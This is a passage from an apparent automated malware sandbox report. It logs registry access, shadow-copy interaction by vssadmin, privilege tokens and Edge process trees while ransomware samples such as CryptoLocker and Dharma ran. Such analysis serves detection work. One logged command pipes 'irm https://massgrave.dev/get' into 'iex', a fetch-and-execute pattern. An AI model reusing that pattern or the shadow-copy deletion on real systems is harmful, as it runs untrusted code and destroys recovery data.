Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Program crash 1 IoCs

pid	pid_target	Process	procid_target
15016	14888	WerFault.exe	229

System Location Discovery: System Language Discovery 1 TTPs 38 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SearchHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Satana.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Seftad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GSAutoClicker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	{34184A33-0407-212E-3320-09040709E2C2}.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Dharma.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CryptoLocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	{34184A33-0407-212E-3320-09040709E2C2}.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nc123.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mssql2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CoronaVirus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Satana.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 3 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
30136	vssadmin.exe
14608	vssadmin.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings	msedge.exe

NTFS ADS 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\GSAutoClicker.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\The-MALWARE-Repo-master.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 355934.crdownload:SmartScreen	msedge.exe
File created	C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe\:Zone.Identifier:$DATA	CryptoLocker.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 37491.crdownload:SmartScreen	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4128	msedge.exe
4128	msedge.exe
3348	msedge.exe
3348	msedge.exe
2912	identity_helper.exe
2912	identity_helper.exe
716	msedge.exe
716	msedge.exe
5832	msedge.exe
5832	msedge.exe
6104	msedge.exe
6104	msedge.exe
6104	msedge.exe
6104	msedge.exe
5996	msedge.exe
5996	msedge.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe
3604	CoronaVirus.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5136	GSAutoClicker.exe

Suspicious behavior: LoadsDriver 32 IoCs

pid	Process
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe
4688	mssql.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeDebugPrivilege	1832	mssql2.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeLoadDriverPrivilege	4688	mssql.exe
Token: SeIncreaseQuotaPrivilege	5580	WMIC.exe
Token: SeSecurityPrivilege	5580	WMIC.exe
Token: SeTakeOwnershipPrivilege	5580	WMIC.exe
Token: SeLoadDriverPrivilege	5580	WMIC.exe
Token: SeSystemProfilePrivilege	5580	WMIC.exe
Token: SeSystemtimePrivilege	5580	WMIC.exe
Token: SeProfSingleProcessPrivilege	5580	WMIC.exe
Token: SeIncBasePriorityPrivilege	5580	WMIC.exe
Token: SeCreatePagefilePrivilege	5580	WMIC.exe
Token: SeBackupPrivilege	5580	WMIC.exe
Token: SeRestorePrivilege	5580	WMIC.exe
Token: SeShutdownPrivilege	5580	WMIC.exe
Token: SeDebugPrivilege	5580	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5580	WMIC.exe
Token: SeRemoteShutdownPrivilege	5580	WMIC.exe
Token: SeUndockPrivilege	5580	WMIC.exe
Token: SeManageVolumePrivilege	5580	WMIC.exe
Token: 33	5580	WMIC.exe
Token: 34	5580	WMIC.exe
Token: 35	5580	WMIC.exe
Token: 36	5580	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5580	WMIC.exe
Token: SeSecurityPrivilege	5580	WMIC.exe
Token: SeTakeOwnershipPrivilege	5580	WMIC.exe
Token: SeLoadDriverPrivilege	5580	WMIC.exe
Token: SeSystemProfilePrivilege	5580	WMIC.exe
Token: SeSystemtimePrivilege	5580	WMIC.exe
Token: SeProfSingleProcessPrivilege	5580	WMIC.exe
Token: SeIncBasePriorityPrivilege	5580	WMIC.exe
Token: SeCreatePagefilePrivilege	5580	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe

Suspicious use of SendNotifyMessage 53 IoCs

pid	Process
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
3348	msedge.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
5136	GSAutoClicker.exe
1108	SearchHost.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
5432	Seftad.exe
4688	mssql.exe
1832	mssql2.exe
1108	SearchHost.exe
4688	mssql.exe
14340	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3348 wrote to memory of 4312	3348	msedge.exe	77
PID 3348 wrote to memory of 4312	3348	msedge.exe	77
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 3296	3348	msedge.exe	78
PID 3348 wrote to memory of 4128	3348	msedge.exe	79
PID 3348 wrote to memory of 4128	3348	msedge.exe	79
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80
PID 3348 wrote to memory of 400	3348	msedge.exe	80

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2092	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://irm https://massgrave.dev/get | iex
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xb8,0x10c,0x7ffd4a113cb8,0x7ffd4a113cc8,0x7ffd4a113cd8
  2⤵
  PID:4312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
  2⤵
  PID:3296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
  2⤵
  PID:400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
  2⤵
  PID:3332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
  2⤵
  PID:4472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:1
  2⤵
  PID:2368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
  2⤵
  PID:2932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:1
  2⤵
  PID:4896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4184 /prefetch:1
  2⤵
  PID:412
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5148 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
  2⤵
  PID:760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
  2⤵
  PID:384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3924 /prefetch:1
  2⤵
  PID:5112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5848 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
  2⤵
  PID:2152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1792,7296801820982444468,15538843913300796701,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4124 /prefetch:1
  2⤵
  PID:2220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
